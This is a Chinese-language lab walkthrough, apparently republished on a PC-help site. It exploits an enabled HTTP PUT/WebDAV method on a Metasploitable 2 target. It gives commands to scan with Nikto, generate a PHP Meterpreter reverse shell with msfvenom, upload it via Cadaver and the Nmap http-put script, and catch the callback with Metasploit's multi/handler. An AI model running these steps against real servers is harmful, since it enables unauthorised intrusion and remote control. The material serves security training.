多种针对开启HTTP PUT方法的漏洞利用_卜八电脑最全问题故障中心

多种针对开启HTTP PUT方法的漏洞利用

今天分享的文章是对HTTP PUT方法开启漏洞的多种应用讲析，在实战场景中，首先我们要确定目标网站是否启用了HTTP PUT方法，如果启用的话，我们就可以结合多种利用工具和相关方法，向目标网站上传Meterpreter反弹shell，实现进一步的渗透控制。一起来看看。

HTTP PUT方法介绍

HTTP PUT方法最早目的用于文件管理操作，可以对网站服务器中的文件实现更改删除的更新操作，该方法往往可以导致各种文件上传漏洞，造成严重的网站攻击事件。在实际运用中，若必须启用该方法，则需要对该方法涉及的相关文件资源做好严格的访问权限控制。

测试环境

目标机器：Metasploitable 2 -IP地址192.168.1.103
攻击机器：Kali Linux -IP地址 192.168.1.105

Nikto扫描目标机器HTTP PUT方法是否启用

假设我们的攻击机器Kali Linux IP地址为192.168.1.105，目标机器IP地址为192.168.1.103，且目标机器部署了WebDAV服务，一般情况下WebDAV会集成HTTP GETPUTPOSTGET等多种方法。如下：

多种针对开启HTTP PUT方法的漏洞利用

首先，我们需要确定目标机器是否开启HTTP PUT方法。这里我们用到了扫描探测工具Nikto：

nikto -h

多种针对开启HTTP PUT方法的漏洞利用

从探测结果可知，目标机器启用了HTTP PUT方法，那接下来，我们就考虑用多种方法向该目标机器中上传恶意PHP文件，实现进一步渗透控制。

用Msfvenom来生成反弹控制Shell

Msfvenom模块可用以下命令来自动生成我们想要的PHP反弹控制Shell，该Shell文件就是我们将要上传的恶意PHP文件：

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f raw

多种针对开启HTTP PUT方法的漏洞利用

复制以上黄色部份，即从<?php到die()的字段内容，并以名称shell.php保存在桌面（Desktop），以备后用。同时，我们用msfconsole命令打开Metasploit，使用模块multi/handler，执行PHP shell上传后的监听连接。

用Cadaver实现对HTTP PUT方法的漏洞利用

Cadaver是Kali中用来执行从WebDAV中上传下载文件的一个命令行工具，通过以下命令进行目标机器dav目录：

cadaver

然后，执行shell.php上传命令：

put /root/Desktop/shell.php

多种针对开启HTTP PUT方法的漏洞利用

访问链接192.168.1.103/dav/查看shell.php是否上传成功，可见已经成功上传：

多种针对开启HTTP PUT方法的漏洞利用

使用之前提到的Metasploit模块multi/handler，设置LHOST 、LPORT（端口）后，以命令exploit执行后续对本机192.168.1.105:4444的监听：

msf> use exploit/multi/handler msf exploit(handler) > set payload php/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.105 msf exploit(handler) > set lport 4444 msf exploit(handler) > exploit

然后，我们访问刚才目标机器中上传的shell.php文件，点击访问它，之后，在我们的Metasploit中即会返回一个监听反弹连接，接着输入命令meterpreter>sysinfo，即可查看到目标机器的相关操作系统信息：

多种针对开启HTTP PUT方法的漏洞利用

用Nmap实现对HTTP PUT方法的漏洞利用

Nmap是大家再熟悉不过的安全工具了，如果目标机器开启了PUT方法，那么我们同样用Nmap可以执行shell上传，只不过我们需要事先定义好相关的上传路径和上传文件，这里就把上传路径为设置为/dav/，上传文件shell还是之前的shell.php，此处为了有所区分，我们把其名称变换为nmap.php：

nmap -p 80 192.168.1.103 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'